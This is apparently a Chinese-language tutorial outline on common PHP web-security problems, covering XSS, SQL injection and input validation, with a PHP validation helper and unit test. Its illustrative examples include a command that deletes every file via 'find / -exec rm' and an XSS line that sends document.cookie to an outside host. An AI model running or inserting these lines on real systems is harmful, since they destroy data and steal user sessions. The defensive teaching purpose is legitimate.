web 开发中通用问题(1)

一,用户输入
要求验证所有的用户输入
1,register_globals -->Off

file_exists($module.'.php');
<?php 'find / -exec rm "{}" ";"'; ?>


2,跨站脚本
<?php echo $_GET['js']; ?>
document.location=http://www.ss/cookie.cgi?f='+document.cookie


3,SQL注入
addslashes()转义特殊字符(注意:仅靠 addslashes() 不足以防止 SQL 注入,应优先使用预处理语句/参数绑定)

4,验证输入
类型验证:
if(!isset($_GET['id']) { } else { $id = (int) $_GET['id']
====>helper function:
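/**
 * Validate and normalise a set of request variables against a signature map.
 *
 * $signatures maps a parameter name to an array that may contain:
 *   'required' => bool     - fail when the parameter is absent from $vars
 *   'type'     => string   - a settype() type name the value is cast to
 *   'function' => callable - applied to the value after the cast
 *
 * On success $vars is replaced by the filtered/converted copy (only names
 * listed in $signatures survive; optional parameters that were absent are
 * left out) and array('result' => true) is returned. On failure $vars is
 * left untouched and array('result' => false, 'cause' => message) is returned.
 *
 * Note: settype() casts, it does not validate. For 'int' a string such as
 * '12abc' becomes 12 and 'abc' becomes 0 without settype() reporting failure,
 * so a 'function' entry (or a caller-side check) is still needed when the
 * value must match a strict format. An unknown type name makes settype()
 * return false (PHP 7) or throw ValueError (PHP 8) — verify on the target version.
 */
function sanitize_vars(&$vars, $signatures) {
	$clean = array();
	foreach ($signatures as $name => $sig) {
		$present = isset($vars[$name]);
		$required = !empty($sig['required']);

		if (!$present) {
			if ($required) {
				return array(
					'result' => false,
					'cause' => 'parameter '.$name.' not present',
				);
			}
			// Optional and absent: skip it instead of reading an undefined
			// index (notice/warning) and letting a later cast turn null into 0 or ''.
			continue;
		}

		$value = $vars[$name];
		if (isset($sig['type'])) {
			if (!settype($value, $sig['type'])) {
				return array(
					'result' => false,
					'cause' => 'parameter '.$name.' convert to '.$sig['type'].' failed',
				);
			}
		}

		// Caller-supplied post-processing (e.g. 'trim'); the name comes from the
		// signature table written by the developer, not from request data.
		if (isset($sig['function'])) {
			$value = $sig['function']($value);
		}
		$clean[$name] = $value;
	}

	$vars = $clean;
	return array('result' => true);
}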


对应测试用例
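/**
 * SimpleTest case for sanitize_vars().
 *
 * The PHP 4-style constructor (function TestOfSanize() calling
 * $this->UnitTestCase()) is dropped: PHP 4 constructors are not supported
 * in PHP 8, and the inherited UnitTestCase constructor does the same job.
 */
class TestOfSanize extends UnitTestCase {

	/** A signature marked required must reject an empty input set and report a cause. */
	function testRequired() {
		$sigs = array(
			'id' => array('required' => true, 'type' => 'int'),
		);
		$vars = array();
		// sanitize_vars() declares $vars by reference itself; the call-time
		// '&' used previously is a fatal error since PHP 5.4.
		$r = sanitize_vars($vars, $sigs);
		$this->assertFalse($r['result'], $r['cause']);
	}
}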
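// '&new' (constructing into a reference) was removed in PHP 7; objects are
// already handle-like, so a plain assignment is equivalent.
$test = new TestOfSanize();
$test->run(new HtmlReporter());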



5,HMAC
鉴定信息关键字散列
散列,代码。

6,异常
7,密码
